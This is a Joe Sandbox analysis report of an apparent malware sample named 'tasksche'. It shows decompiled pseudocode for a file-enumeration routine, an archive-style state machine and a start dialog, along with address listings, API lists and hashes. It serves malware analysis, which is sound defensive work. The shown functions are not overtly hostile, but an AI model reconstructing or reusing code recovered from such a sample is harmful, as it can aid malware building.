                                                                                              											__eflags = _t329;
                                                                                              											 *(_t360 + 0x65c4) = _t329;
                                                                                              										}
                                                                                              										 *((char*)(_t360 + 0xb05c)) = 1;
                                                                                              										goto L80;
                                                                                              									}
                                                                                              									L36:
                                                                                              									E00401CA3(_t360, _t360 + 0x1e);
                                                                                              									goto L87;
                                                                                              								}
                                                                                              								__eflags = _t243 - 5;
                                                                                              								if(_t243 == 5) {
                                                                                              									_t443 = _t243;
                                                                                              									memcpy(_t360 + 0x88e8, _t479, 0 << 2);
                                                                                              									_t466 = _t479 + _t443 + _t443;
                                                                                              									 *(_t360 + 0x8904) = E0040B60D(_t460) & 0x00000001;
                                                                                              									 *((char*)(_t360 + 0x8907)) = 0;
                                                                                              									 *((char*)(_t360 + 0x8905)) = 0;
                                                                                              									 *((char*)(_t360 + 0x8906)) = 0;
                                                                                              								}
                                                                                              								goto L80;
                                                                                              							}
                                                                                              							 *(_t482 + 0x18) = E0040B60D(_t460);
                                                                                              							_t335 =  *(_t360 + 0x6558);
                                                                                              							 *(_t482 + 0x1c) = _t460;
                                                                                              							__eflags = _t460;
                                                                                              							if(__eflags < 0) {
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							if(__eflags > 0) {
                                                                                              								L26:
                                                                                              								E00401C80(_t360);
                                                                                              								goto L6;
                                                                                              							}
                                                                                              							__eflags =  *(_t482 + 0x18) - _t335;
                                                                                              							if(__eflags < 0) {
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							goto L26;
                                                                                              						}
                                                                                              						E00401C80(_t360);
                                                                                              						 *((char*)(_t360 + 0xb064)) = 1;
                                                                                              						E004062BA(0x4335ac, 3);
                                                                                              						__eflags =  *((char*)(_t482 + 0x53));
                                                                                              						if( *((char*)(_t482 + 0x53)) == 0) {
                                                                                              							goto L22;
                                                                                              						} else {
                                                                                              							E0040639F(4, _t360 + 0x1e, _t360 + 0x1e);
                                                                                              							 *((char*)(_t360 + 0xb065)) = 1;
                                                                                              							goto L87;
                                                                                              						}
                                                                                              					} else {
                                                                                              						E00401C37(_t360, _t460, __eflags);
                                                                                              						goto L87;
                                                                                              					}
                                                                                              				}
                                                                                              				_t460 =  *(__ecx + 0xb044);
                                                                                              				_t343 =  *((intOrPtr*)(__ecx + 0xb060)) + 8;
                                                                                              				asm("adc ecx, edi");
                                                                                              				_t494 = _t460;
                                                                                              				if(_t494 < 0 || _t494 <= 0 &&  *((intOrPtr*)(__ecx + 0xb040)) <= _t343) {
                                                                                              					goto L7;
                                                                                              				} else {
                                                                                              					 *((char*)(_t482 + 0x53)) = 1;
                                                                                              					E00401BBB(_t360);
                                                                                              					_t346 =  *((intOrPtr*)( *_t360 + 8))(_t482 + 0x10, 0x10);
                                                                                              					_t496 = _t346 - 0x10;
                                                                                              					if(_t346 == 0x10) {
                                                                                              						_t479 = _t360 + 0x1024;
                                                                                              						E00405FE7(_t479, _t460, _t466, 5,  *((intOrPtr*)(_t360 + 0x6524)) + 0x4024, _t360 + 0x65cc, _t482 + 0x10,  *(_t360 + 0x65c8), _t466, _t482 + 0x20);
                                                                                              						__eflags =  *(_t360 + 0x65c4);
                                                                                              						if( *(_t360 + 0x65c4) == 0) {
                                                                                              							L11:
                                                                                              							 *(_t482 + 0x44) = _t479;
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						_t355 = E0041AC04(_t482 + 0x20, _t360 + 0x65dc, 8);
                                                                                              						_t485 = _t485 + 0xc;
                                                                                              						__eflags = _t355;
                                                                                              						if(_t355 == 0) {
                                                                                              							goto L11;
                                                                                              						} else {
                                                                                              							E00406376(6, _t360 + 0x1e);
                                                                                              							 *((char*)(_t360 + 0xb065)) = 1;
                                                                                              							E004062BA(0x4335ac, 0xb);
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				}
                                                                                              			}


























































                                                                                              0x00402f2d
                                                                                              0x00402f35
                                                                                              0x00402f3f
                                                                                              0x00402f45
                                                                                              0x00402f46
                                                                                              0x00402f4d
                                                                                              0x00402f52
                                                                                              0x00402f5b
                                                                                              0x00402f5e
                                                                                              0x00402faf
                                                                                              0x00402faf
                                                                                              0x0040302f
                                                                                              0x00403034
                                                                                              0x00403039
                                                                                              0x0040303c
                                                                                              0x00402fa0
                                                                                              0x00402fa2
                                                                                              0x00402fa7
                                                                                              0x00402fa7
                                                                                              0x00403680
                                                                                              0x00403680
                                                                                              0x00403682
                                                                                              0x00403685
                                                                                              0x0040368a
                                                                                              0x0040368b
                                                                                              0x0040368d
                                                                                              0x00403693
                                                                                              0x0040369e
                                                                                              0x0040369e
                                                                                              0x00403045
                                                                                              0x0040304c
                                                                                              0x0040305c
                                                                                              0x00403066
                                                                                              0x00403068
                                                                                              0x0040306f
                                                                                              0x00403071
                                                                                              0x00403675
                                                                                              0x00403677
                                                                                              0x0040367c
                                                                                              0x0040367c
                                                                                              0x00000000
                                                                                              0x0040367c
                                                                                              0x00403077
                                                                                              0x00403079
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040307f
                                                                                              0x00403081
                                                                                              0x00403081
                                                                                              0x00403084
                                                                                              0x00403084
                                                                                              0x00403087
                                                                                              0x00403089
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040308f
                                                                                              0x00403092
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040309c
                                                                                              0x004030a1
                                                                                              0x004030a4
                                                                                              0x004030bd
                                                                                              0x004030c8
                                                                                              0x004030ce
                                                                                              0x004030d3
                                                                                              0x004030de
                                                                                              0x004030ea
                                                                                              0x004030f3
                                                                                              0x004030f5
                                                                                              0x004030fb
                                                                                              0x004030ff
                                                                                              0x00403103
                                                                                              0x0040313d
                                                                                              0x0040313d
                                                                                              0x0040313f
                                                                                              0x00403146
                                                                                              0x00403149
                                                                                              0x0040314c
                                                                                              0x0040317b
                                                                                              0x0040317b
                                                                                              0x00403182
                                                                                              0x00403185
                                                                                              0x00403188
                                                                                              0x00403192
                                                                                              0x00403195
                                                                                              0x00403195
                                                                                              0x004031a0
                                                                                              0x004031ad
                                                                                              0x004031b6
                                                                                              0x004031b9
                                                                                              0x004031bf
                                                                                              0x004031c5
                                                                                              0x004031cb
                                                                                              0x004031ce
                                                                                              0x0040358d
                                                                                              0x00403595
                                                                                              0x0040359c
                                                                                              0x0040359d
                                                                                              0x0040359d
                                                                                              0x004035a2
                                                                                              0x004035ac
                                                                                              0x004035ba
                                                                                              0x004035c8
                                                                                              0x004035d6
                                                                                              0x004035dc
                                                                                              0x004035e3
                                                                                              0x004035ea
                                                                                              0x004035ec
                                                                                              0x004035fe
                                                                                              0x004035fe
                                                                                              0x004035fe
                                                                                              0x004035ee
                                                                                              0x004035f6
                                                                                              0x004035f6
                                                                                              0x00403605
                                                                                              0x0040360c
                                                                                              0x0040361c
                                                                                              0x0040361c
                                                                                              0x0040361c
                                                                                              0x00000000
                                                                                              0x0040360e
                                                                                              0x0040360e
                                                                                              0x00403615
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403619
                                                                                              0x0040361e
                                                                                              0x0040361e
                                                                                              0x00403627
                                                                                              0x0040362a
                                                                                              0x00403632
                                                                                              0x00403633
                                                                                              0x00403639
                                                                                              0x0040363c
                                                                                              0x0040363c
                                                                                              0x00403641
                                                                                              0x00403647
                                                                                              0x0040364d
                                                                                              0x0040365f
                                                                                              0x0040365f
                                                                                              0x00403663
                                                                                              0x00403666
                                                                                              0x00403668
                                                                                              0x0040366b
                                                                                              0x00403670
                                                                                              0x00403671
                                                                                              0x00000000
                                                                                              0x00403671
                                                                                              0x0040364f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403657
                                                                                              0x0040365d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040365d
                                                                                              0x0040360c
                                                                                              0x004031d4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031da
                                                                                              0x004031dd
                                                                                              0x004032f7
                                                                                              0x004032fa
                                                                                              0x00403300
                                                                                              0x00403302
                                                                                              0x00403302
                                                                                              0x00403308
                                                                                              0x0040330e
                                                                                              0x00403311
                                                                                              0x0040331b
                                                                                              0x0040331c
                                                                                              0x0040331e
                                                                                              0x00403325
                                                                                              0x00403328
                                                                                              0x00403334
                                                                                              0x00403338
                                                                                              0x0040333f
                                                                                              0x0040334d
                                                                                              0x00403358
                                                                                              0x00403367
                                                                                              0x00403367
                                                                                              0x00403369
                                                                                              0x0040336f
                                                                                              0x00403375
                                                                                              0x0040337c
                                                                                              0x00403382
                                                                                              0x00403382
                                                                                              0x00403388
                                                                                              0x0040338e
                                                                                              0x00403394
                                                                                              0x00403396
                                                                                              0x0040339c
                                                                                              0x004033a2
                                                                                              0x004033aa
                                                                                              0x004033aa
                                                                                              0x004033ac
                                                                                              0x00000000
                                                                                              0x004033a4
                                                                                              0x004033a4
                                                                                              0x004033ae
                                                                                              0x004033b1
                                                                                              0x004033b7
                                                                                              0x004033bd
                                                                                              0x004033c2
                                                                                              0x004033c9
                                                                                              0x004033cc
                                                                                              0x004033df
                                                                                              0x004033df
                                                                                              0x004033e4
                                                                                              0x004033ea
                                                                                              0x004033ed
                                                                                              0x004033f4
                                                                                              0x004033f9
                                                                                              0x00403404
                                                                                              0x00403404
                                                                                              0x0040340a
                                                                                              0x00403414
                                                                                              0x00403421
                                                                                              0x00403424
                                                                                              0x0040342c
                                                                                              0x00403437
                                                                                              0x0040343a
                                                                                              0x0040343f
                                                                                              0x00403442
                                                                                              0x0040344f
                                                                                              0x00403455
                                                                                              0x0040345b
                                                                                              0x00403461
                                                                                              0x00403464
                                                                                              0x0040346e
                                                                                              0x00403470
                                                                                              0x00403472
                                                                                              0x00403472
                                                                                              0x00403472
                                                                                              0x00403466
                                                                                              0x00403466
                                                                                              0x00403466
                                                                                              0x00403475
                                                                                              0x0040347f
                                                                                              0x00403492
                                                                                              0x00403496
                                                                                              0x0040349c
                                                                                              0x004034a2
                                                                                              0x004034af
                                                                                              0x004034af
                                                                                              0x004034af
                                                                                              0x00000000
                                                                                              0x004034a4
                                                                                              0x004034a4
                                                                                              0x004034a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004034ac
                                                                                              0x004034b1
                                                                                              0x004034b7
                                                                                              0x004034c6
                                                                                              0x004034d5
                                                                                              0x004034e4
                                                                                              0x004034e6
                                                                                              0x004034f4
                                                                                              0x004034fa
                                                                                              0x00403500
                                                                                              0x00403502
                                                                                              0x00403504
                                                                                              0x00403504
                                                                                              0x00403511
                                                                                              0x00403516
                                                                                              0x00403523
                                                                                              0x0040352e
                                                                                              0x00403536
                                                                                              0x00403539
                                                                                              0x0040353b
                                                                                              0x0040353c
                                                                                              0x00403542
                                                                                              0x00403545
                                                                                              0x00403545
                                                                                              0x0040354a
                                                                                              0x0040354e
                                                                                              0x00403560
                                                                                              0x00403567
                                                                                              0x00403569
                                                                                              0x0040356b
                                                                                              0x0040356b
                                                                                              0x00403550
                                                                                              0x00403553
                                                                                              0x00403553
                                                                                              0x00403572
                                                                                              0x00403576
                                                                                              0x00403583
                                                                                              0x00403583
                                                                                              0x00000000
                                                                                              0x00403576
                                                                                              0x004034a2
                                                                                              0x004033a6
                                                                                              0x004033a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004033a8
                                                                                              0x004033a2
                                                                                              0x004031e3
                                                                                              0x004031e6
                                                                                              0x00403227
                                                                                              0x0040322e
                                                                                              0x0040322e
                                                                                              0x00403233
                                                                                              0x00403238
                                                                                              0x0040323a
                                                                                              0x00403259
                                                                                              0x00403264
                                                                                              0x00403267
                                                                                              0x0040326d
                                                                                              0x00403270
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040327e
                                                                                              0x00403283
                                                                                              0x0040328a
                                                                                              0x0040328e
                                                                                              0x00403298
                                                                                              0x004032a6
                                                                                              0x004032af
                                                                                              0x004032bb
                                                                                              0x004032c8
                                                                                              0x004032d7
                                                                                              0x004032e1
                                                                                              0x004032e3
                                                                                              0x004032e3
                                                                                              0x004032e5
                                                                                              0x004032e5
                                                                                              0x004032eb
                                                                                              0x00000000
                                                                                              0x004032eb
                                                                                              0x0040323c
                                                                                              0x00403242
                                                                                              0x00000000
                                                                                              0x00403242
                                                                                              0x004031e8
                                                                                              0x004031eb
                                                                                              0x004031f2
                                                                                              0x004031f9
                                                                                              0x004031f9
                                                                                              0x00403205
                                                                                              0x0040320b
                                                                                              0x00403212
                                                                                              0x00403219
                                                                                              0x00403219
                                                                                              0x00000000
                                                                                              0x004031eb
                                                                                              0x00403158
                                                                                              0x0040315b
                                                                                              0x00403161
                                                                                              0x00403164
                                                                                              0x00403166
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403168
                                                                                              0x0040316f
                                                                                              0x00403171
                                                                                              0x00000000
                                                                                              0x00403171
                                                                                              0x0040316a
                                                                                              0x0040316d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040316d
                                                                                              0x00403107
                                                                                              0x00403113
                                                                                              0x0040311a
                                                                                              0x0040311f
                                                                                              0x00403123
                                                                                              0x00000000
                                                                                              0x00403125
                                                                                              0x0040312c
                                                                                              0x00403131
                                                                                              0x00000000
                                                                                              0x00403131
                                                                                              0x004030a6
                                                                                              0x004030a8
                                                                                              0x00000000
                                                                                              0x004030a8
                                                                                              0x004030a4
                                                                                              0x00402f66
                                                                                              0x00402f6e
                                                                                              0x00402f71
                                                                                              0x00402f73
                                                                                              0x00402f75
                                                                                              0x00000000
                                                                                              0x00402f83
                                                                                              0x00402f85
                                                                                              0x00402f89
                                                                                              0x00402f98
                                                                                              0x00402f9b
                                                                                              0x00402f9e
                                                                                              0x00402fd9
                                                                                              0x00402fe2
                                                                                              0x00402fe7
                                                                                              0x00402fee
                                                                                              0x0040302c
                                                                                              0x0040302c
                                                                                              0x00000000
                                                                                              0x0040302c
                                                                                              0x00402ffd
                                                                                              0x00403002
                                                                                              0x00403005
                                                                                              0x00403007
                                                                                              0x00000000
                                                                                              0x00403009
                                                                                              0x0040300f
                                                                                              0x0040301b
                                                                                              0x00403022
                                                                                              0x00000000
                                                                                              0x00403022
                                                                                              0x00403007
                                                                                              0x00000000
                                                                                              0x00402f9e

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp$H_prolog
                                                                                              • String ID: @$CMT
                                                                                              • API String ID: 212800410-3935043585
                                                                                              • Opcode ID: f7efa0f1f901984cc3855dbe14d8362dcde98928de1018f3c2431534fcf72b9a
                                                                                              • Instruction ID: 4535b6ba2d5654eb70152741eafeedd3820f65e0183003bc7b62017ff8f1088e
                                                                                              • Opcode Fuzzy Hash: f7efa0f1f901984cc3855dbe14d8362dcde98928de1018f3c2431534fcf72b9a
                                                                                              • Instruction Fuzzy Hash: 252215715006849FDB24DF24C891BDA3BE5AF14308F08057FED4AEB2C6DB799588CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 819 409476-409499 call 41aaf0 822 409505-409510 FindNextFileW 819->822 823 40949b-4094ac FindFirstFileW 819->823 826 409512-409522 GetLastError 822->826 827 409528-40952c 822->827 824 409532-4095f8 call 410b9c call 40a745 call 41abd0 call 411333 * 3 823->824 825 4094b2-4094c4 call 40a3dc 823->825 828 4095fd-40960b 824->828 834 4094c6-4094dc FindFirstFileW 825->834 835 4094de-4094e7 GetLastError 825->835 826->827 827->824 827->828 834->824 834->835 837 4094f8 835->837 838 4094e9-4094ec 835->838 841 4094fa-409500 837->841 838->837 840 4094ee-4094f1 838->840 840->837 843 4094f3-4094f6 840->843 841->828 843->841
                                                                                              C-Code - Quality: 83%
                                                                                              			E00409476(intOrPtr __edx, signed int _a4, WCHAR* _a8, intOrPtr _a12) {
                                                                                              				intOrPtr _v572;
                                                                                              				intOrPtr _v580;
                                                                                              				intOrPtr _v588;
                                                                                              				struct _WIN32_FIND_DATAW _v596;
                                                                                              				short _v4692;
                                                                                              				signed int _t51;
                                                                                              				signed int _t57;
                                                                                              				signed int _t71;
                                                                                              				void* _t73;
                                                                                              				long _t76;
                                                                                              				char _t77;
                                                                                              				void* _t81;
                                                                                              				intOrPtr _t87;
                                                                                              				intOrPtr _t90;
                                                                                              
                                                                                              				_t87 = __edx;
                                                                                              				E0041AAF0(0x1250);
                                                                                              				_t90 = _a12;
                                                                                              				_push( &_v596);
                                                                                              				if(_a4 != 0xffffffff) {
                                                                                              					_t51 = FindNextFileW(_a4, ??);
                                                                                              					__eflags = _t51;
                                                                                              					if(_t51 == 0) {
                                                                                              						_a4 = _a4 | 0xffffffff;
                                                                                              						_t71 = GetLastError();
                                                                                              						__eflags = _t71 - 0x12;
                                                                                              						_t16 = _t71 != 0x12;
                                                                                              						__eflags = _t16;
                                                                                              						 *((char*)(_t90 + 0x1044)) = _t71 & 0xffffff00 | _t16;
                                                                                              					}
                                                                                              					__eflags = _a4 - 0xffffffff;
                                                                                              					if(_a4 != 0xffffffff) {
                                                                                              						goto L13;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t73 = FindFirstFileW(_a8, ??); // executed
                                                                                              					_a4 = _t73;
                                                                                              					if(_t73 != 0xffffffff) {
                                                                                              						L13:
                                                                                              						E00410B9C(_t90, _a8, 0x800);
                                                                                              						_push(0x800);
                                                                                              						E0040A745(__eflags, _t90,  &(_v596.cFileName));
                                                                                              						_t57 = E0041ABD0(_v596.nFileSizeHigh, 0, 0, 1) + _v596.nFileSizeLow;
                                                                                              						__eflags = _t57;
                                                                                              						 *(_t90 + 0x1000) = _t57;
                                                                                              						 *(_t90 + 0x1008) = _v596.dwFileAttributes;
                                                                                              						 *((intOrPtr*)(_t90 + 0x1028)) = _v596.ftCreationTime;
                                                                                              						 *((intOrPtr*)(_t90 + 0x102c)) = _v588;
                                                                                              						 *((intOrPtr*)(_t90 + 0x1030)) = _v596.ftLastAccessTime;
                                                                                              						 *((intOrPtr*)(_t90 + 0x1034)) = _v580;
                                                                                              						 *((intOrPtr*)(_t90 + 0x1038)) = _v596.ftLastWriteTime;
                                                                                              						 *((intOrPtr*)(_t90 + 0x103c)) = _v572;
                                                                                              						asm("adc edx, edi");
                                                                                              						 *((intOrPtr*)(_t90 + 0x1004)) = _t87;
                                                                                              						E00411333(_t90 + 0x1010,  &(_v596.ftLastWriteTime));
                                                                                              						E00411333(_t90 + 0x1018,  &(_v596.ftCreationTime));
                                                                                              						E00411333(_t90 + 0x1020,  &(_v596.ftLastAccessTime));
                                                                                              					} else {
                                                                                              						if(E0040A3DC(_a8,  &_v4692, 0x800) == 0) {
                                                                                              							L4:
                                                                                              							_t76 = GetLastError();
                                                                                              							if(_t76 == 2 || _t76 == 3 || _t76 == 0x12) {
                                                                                              								_t77 = 0;
                                                                                              								__eflags = 0;
                                                                                              							} else {
                                                                                              								_t77 = 1;
                                                                                              							}
                                                                                              							 *((char*)(_t90 + 0x1044)) = _t77;
                                                                                              						} else {
                                                                                              							_t81 = FindFirstFileW( &_v4692,  &_v596);
                                                                                              							_a4 = _t81;
                                                                                              							if(_t81 != 0xffffffff) {
                                                                                              								goto L13;
                                                                                              							} else {
                                                                                              								goto L4;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				 *(_t90 + 0x1040) =  *(_t90 + 0x1040) & 0x00000000;
                                                                                              				return _a4;
                                                                                              			}

















                                                                                              0x00409476
                                                                                              0x0040947e
                                                                                              0x00409489
                                                                                              0x00409498
                                                                                              0x00409499
                                                                                              0x00409508
                                                                                              0x0040950e
                                                                                              0x00409510
                                                                                              0x00409512
                                                                                              0x00409516
                                                                                              0x0040951c
                                                                                              0x0040951f
                                                                                              0x0040951f
                                                                                              0x00409522
                                                                                              0x00409522
                                                                                              0x00409528
                                                                                              0x0040952c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040949b
                                                                                              0x004094a4
                                                                                              0x004094a6
                                                                                              0x004094ac
                                                                                              0x00409532
                                                                                              0x00409537
                                                                                              0x0040953c
                                                                                              0x00409545
                                                                                              0x00409563
                                                                                              0x00409563
                                                                                              0x00409565
                                                                                              0x00409571
                                                                                              0x0040957d
                                                                                              0x00409589
                                                                                              0x00409595
                                                                                              0x004095a1
                                                                                              0x004095ad
                                                                                              0x004095b9
                                                                                              0x004095c5
                                                                                              0x004095ce
                                                                                              0x004095d4
                                                                                              0x004095e6
                                                                                              0x004095f8
                                                                                              0x004094b2
                                                                                              0x004094c4
                                                                                              0x004094de
                                                                                              0x004094de
                                                                                              0x004094e7
                                                                                              0x004094f8
                                                                                              0x004094f8
                                                                                              0x004094f3
                                                                                              0x004094f5
                                                                                              0x004094f5
                                                                                              0x004094fa
                                                                                              0x004094c6
                                                                                              0x004094d4
                                                                                              0x004094d6
                                                                                              0x004094dc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004094dc
                                                                                              0x004094c4
                                                                                              0x004094ac
                                                                                              0x004095fd
                                                                                              0x0040960b

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000800,?,?,?,004096E5,000000FF,?,?,?,?,00408411,?,?,00000000), ref: 004094A4
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,004096E5,000000FF,?,?,?,?,00408411,?,?,00000000), ref: 004094D4
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,004096E5,000000FF,?,?,?,?,00408411,?,?,00000000,?,00000800), ref: 004094DE
                                                                                              • FindNextFileW.KERNEL32(000000FF,?,00000800,?,?,?,004096E5,000000FF,?,?,?,?,00408411,?,?,00000000), ref: 00409508
                                                                                              • GetLastError.KERNEL32(?,004096E5,000000FF,?,?,?,?,00408411,?,?,00000000,?,00000800), ref: 00409516
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                              • String ID:
                                                                                              • API String ID: 869497890-0
                                                                                              • Opcode ID: 2a733cbadd2ca7cd29a11b90f53c863ddd5810a24544a1ec061ee6039bd7df5a
                                                                                              • Instruction ID: 852f22f8762d0aaf1b59ecd7198268998001e7cc0733578d9edc4610c3c70bd0
                                                                                              • Opcode Fuzzy Hash: 2a733cbadd2ca7cd29a11b90f53c863ddd5810a24544a1ec061ee6039bd7df5a
                                                                                              • Instruction Fuzzy Hash: 2E414071500648ABCB21DF29CC84ADA77F8AF48350F10466AF9AEE2291D774AEC1DB14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E0040F58D(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t112;
                                                                                              				void* _t114;
                                                                                              				long _t115;
                                                                                              				long _t116;
                                                                                              				struct HWND__* _t118;
                                                                                              				WCHAR* _t123;
                                                                                              				void* _t127;
                                                                                              				int _t128;
                                                                                              				void* _t145;
                                                                                              				void* _t148;
                                                                                              				WCHAR* _t154;
                                                                                              				signed int _t161;
                                                                                              				struct HWND__* _t164;
                                                                                              				void* _t175;
                                                                                              				void* _t178;
                                                                                              				void* _t180;
                                                                                              				struct HWND__* _t187;
                                                                                              				intOrPtr _t195;
                                                                                              				WCHAR* _t196;
                                                                                              				long _t201;
                                                                                              				void* _t223;
                                                                                              				void* _t225;
                                                                                              				void* _t235;
                                                                                              				void* _t247;
                                                                                              				long _t249;
                                                                                              				long _t250;
                                                                                              				long _t251;
                                                                                              				signed int _t256;
                                                                                              				int _t260;
                                                                                              				int _t262;
                                                                                              				void* _t267;
                                                                                              				void* _t271;
                                                                                              				intOrPtr _t289;
                                                                                              				intOrPtr _t290;
                                                                                              				int _t303;
                                                                                              				long _t308;
                                                                                              				void* _t312;
                                                                                              				struct HWND__* _t316;
                                                                                              				void* _t318;
                                                                                              				void* _t320;
                                                                                              				void* _t325;
                                                                                              
                                                                                              				_t325 = __fp0;
                                                                                              				_t299 = __edx;
                                                                                              				_t283 = __ecx;
                                                                                              				E0041A4DC(E004297DB, _t318);
                                                                                              				E0041AAF0(0x9c94);
                                                                                              				_t316 =  *(_t318 + 8);
                                                                                              				_t112 = E004060EE(__edx, _t316,  *(_t318 + 0xc),  *(_t318 + 0x10),  *(_t318 + 0x14), L"STARTDLG", 0, 0); // executed
                                                                                              				if(_t112 == 0) {
                                                                                              					_t114 =  *(_t318 + 0xc) - 0x110;
                                                                                              					__eflags = _t114;
                                                                                              					if(_t114 == 0) {
                                                                                              						_t115 =  *0x43981c;
                                                                                              						 *0x441840 = _t316;
                                                                                              						 *0x441844 = _t316;
                                                                                              						__eflags = _t115;
                                                                                              						if(_t115 != 0) {
                                                                                              							SendMessageW(_t316, 0x80, 1, _t115); // executed
                                                                                              						}
                                                                                              						_t116 =  *0x439818;
                                                                                              						__eflags = _t116;
                                                                                              						if(__eflags != 0) {
                                                                                              							SendDlgItemMessageW(_t316, 0x6c, 0x172, 0, _t116); // executed
                                                                                              						}
                                                                                              						E0040DBC1(_t299, __eflags, _t325, _t316);
                                                                                              						_t118 = GetDlgItem(_t316, 0x68);
                                                                                              						 *(_t318 + 0x14) = _t118;
                                                                                              						SendMessageW(_t118, 0x435, 0, 0x400000);
                                                                                              						E00419C9B(_t318 - 0x1164, 0x800);
                                                                                              						 *(_t318 + 0x10) = GetDlgItem(_t316, 0x66);
                                                                                              						_t123 = 0x44187a;
                                                                                              						__eflags =  *0x44187a;
                                                                                              						if( *0x44187a == 0) {
                                                                                              							_t123 = _t318 - 0x1164;
                                                                                              						}
                                                                                              						SetWindowTextW( *(_t318 + 0x10), _t123);
                                                                                              						E00419CB2( *(_t318 + 0x10)); // executed
                                                                                              						_push(0x441858);
                                                                                              						_push(0x44184c);
                                                                                              						_push(0x439820);
                                                                                              						_push(_t316);
                                                                                              						 *0x441848 = 0; // executed
                                                                                              						E0040E75F(_t283, _t299, __eflags); // executed
                                                                                              						__eflags =  *0x441858;
                                                                                              						if( *0x441858 > 0) {
                                                                                              							_push(7);
                                                                                              							_push( *0x44184c);
                                                                                              							_push(_t316);
                                                                                              							E0040E857(_t316);
                                                                                              						}
                                                                                              						__eflags =  *0x44185c;
                                                                                              						if( *0x44185c != 0) {
                                                                                              							_t303 = 1;
                                                                                              							__eflags = 1;
                                                                                              						} else {
                                                                                              							SetDlgItemTextW(_t316, 0x6b, E0040C3BF(0xbf));
                                                                                              							_t154 = E0040C3BF(0xbe);
                                                                                              							_t303 = 1;
                                                                                              							SetDlgItemTextW(_t316, 1, _t154);
                                                                                              						}
                                                                                              						__eflags =  *0x441858;
                                                                                              						if( *0x441858 <= 0) {
                                                                                              							L103:
                                                                                              							__eflags =  *0x441848;
                                                                                              							if( *0x441848 != 0) {
                                                                                              								L114:
                                                                                              								__eflags =  *0x441874 - 2;
                                                                                              								if( *0x441874 == 2) {
                                                                                              									EnableWindow( *(_t318 + 0x10), 0);
                                                                                              								}
                                                                                              								__eflags =  *0x441870;
                                                                                              								if( *0x441870 != 0) {
                                                                                              									E004060AB(_t316, 0x67, 0);
                                                                                              									E004060AB(_t316, 0x66, 0);
                                                                                              								}
                                                                                              								_t127 =  *0x441874;
                                                                                              								__eflags = _t127;
                                                                                              								if(_t127 != 0) {
                                                                                              									__eflags =  *0x44183c;
                                                                                              									if( *0x44183c == 0) {
                                                                                              										_push(0);
                                                                                              										_push(_t303);
                                                                                              										_push(0x111);
                                                                                              										_push(_t316);
                                                                                              										__eflags = _t127 - _t303;
                                                                                              										if(_t127 != _t303) {
                                                                                              											PostMessageW();
                                                                                              										} else {
                                                                                              											SendMessageW(); // executed
